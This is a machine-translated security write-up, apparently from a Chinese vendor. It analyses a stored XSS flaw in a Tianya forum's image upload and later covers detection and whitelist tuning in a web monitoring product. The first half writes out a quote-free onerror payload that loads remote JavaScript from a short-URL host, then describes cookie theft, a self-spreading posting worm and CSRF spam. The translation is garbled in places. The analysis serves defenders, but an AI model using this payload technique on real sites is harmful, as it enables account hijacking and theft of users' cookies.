Communication XSS analysis of a large network community

Communication XSS analysis of a large network community

This XSS exists in an inconspicuous Sub-Forum in Tianya. It can be triggered by publishing a new post.


Vulnerability Analysis
The Forum has certain filtering measures for XSS, such as escaping single double quotation marks and filtering left and right angle brackets. Therefore, the general XSS blind injection does not work.
The breakthrough lies in the function of uploading network images when posting.
　　

After the image is uploaded, the image is displayed in the post body, that is, the image URL is directly displayed in the IMG is SRC. Because the Forum filters angle brackets, it cannot break the limits of the IMG tag, so it can only do some actions in the tag. If the Forum does not strictly check double quotation marks, you can use the following ideas to break through the double quotation marks of src and use onerror/onload events to execute arbitrary js Code.
　　

As shown in, the front-end has been verified and it does not matter. You can use Burpsuite to modify the request.
　　

It is found that although the code is successfully inserted, JS execution fails. Because the first double quotation mark is escaped by a slash and the image loading fails, the onload event is not triggered. Use onerror instead, as shown in:
　　

If we really want to do something, it is not enough to just show a box. We need to introduce a remote js file. Therefore, alert (1) in payload must be replaced
S = document. createElement ("script"); s. src = "http://t.cn /? Xxx "; // to shorten the payload length, the js URL is compressed using the Weibo short URL. Document. body. appendChild (s)
In this way, the script tag can be dynamically created to introduce external js. However, writing in this way will fail. Do not forget that the Forum escaped a single double quotation mark, so the above Code is slightly changed.
S = document. createElement (document. head. children [1]. tagName); // script tag inherent on the document. head. children [1] Page. Avoid using quotation marks s. src = String. fromCharCode (104) + String. fromCharCode (116) ...... // The URL is converted in ascii format. Avoid quotation marks. Document. body. appendChild (s)
Check the Cookie to log on to almost all sub-stations.
　　

Therefore, Cookie Stealing may be what hackers are best at. Various domestic XSS platforms have ready-made interfaces.
In addition, what else can we do? We can construct a request to post in various sections, and the users who see the post click to enter the XSS page, without knowing it, the system will use its own account to forward comments to more users. Victims will increase exponentially, and the number of cookies that hackers will reap will also increase exponentially.
By constructing the following XSS code, you can ask the target user to post in the specified section or reply to someone. If it's a big V move, the spread will be amazing.
　　

　　

You can also make the other party automatically add you as a friend, so that you can see the other party in any status in the future, inadvertently you will become a "Big V:
　　

Of course, it also enables the other party to post some status and comments on their own Weibo posts, which play a great role in dissemination.
　　

　　
When hackers control so many user accounts and their cookies, they can do something that can be realized. For example, you can batch send advertisements, SEO, sell users' personal data, or even DDoS

And so on.
Vulnerability capture
Similar to the above case, many alarms were captured on the 360 alert platform. By analyzing the alert content, webmasters were able to learn and fix the vulnerability almost immediately.
　　

That is, the alarm content of this event, from which you can interpret a lot of information. The alarm type shows that the webpage calls an unknown script from a third party. Event_stack records webpage Behaviors Based on the event sequence. The alarm is triggered by creating a SCRIPT tag. | set the SRC attribute of the Script tag to http://t.cn/xxxx”, which is shown in the following figure:
　　

As analyzed above, hackers steal and maintain the Cookie of the victim user, then call a comment interface, and automatically post some comments without the user's knowledge through CSRF, promoted a website.
As of vulnerability repair, the XSS page has been accessed for more than times. However, no user was found to be involved through Google search, because the webmaster used the default blocking mode When configuring the goggles, the malicious JavaScript code is not executed, so this security event does not cause any substantial harm.
　　

360 currently, the watcher has six plug-ins to defend against six different types of XSS attacks. In this event, the "third-party resource probe" plug-in is used.
　　

Speaking of this plug-in, it is really mixed, because it has a high "false alarm", there are two reasons for analysis:
1. browser ad plug-ins and operators' tampered traffic
Before writing this plug-in, I just wanted to quietly prevent XSS from being messed up, but I didn't realize that the domestic front-end environment was so complicated. When the alarm display page contains unpermitted remote js inserts, the original page does not find the js Code. When analyzing js files, we often find that they are naked advertisements. The reason should be that the program installed in the user system has embedded advertisement plug-ins into the browser. You can enter
Chrome: // plugins/
Check whether you have installed these plug-ins properly.
In addition, in order to increase revenue and hijack traffic, operators in some regions directly embed advertisement code on the webpage, leading to "misjudgment" of the mirror ".
Therefore, if you want to know which of the following operators and plug-ins are hijacking traffic, you can try this function.
2. Incorrect whitelist Configuration
Configure a nursing mirror, just like falling in love. You need to turn a girl with unlimited freedom into a good wife and a good mother.
The white list is an important basis for the monitoring mirror to judge XSS. If the configuration is not good, there will be a lot of false positives. If the processing method is configured as blocking mode, the normal page function will be affected.
　　

Domain names that need to be configured as whitelists are generally classified:
The domain name of static media files such as Js, CSS, and images.
The domain name of the iframe resource.
Domain name used for advertising
Domains used for statistical functions
Domain name used for the Web online chat function
Domain names used for Weibo and other promotion functions
We recommend that you set the "dangerous treatment method" to "allow" when introducing the goggles ",
　　

In this way, even configuration errors do not affect the normal operation of the page. At the same time, pay attention to alarms. If a false alarm is detected, add the third-party domain name that causes the false alarm to the whitelist. In this way, you can set the blocking mode after a short period of "training.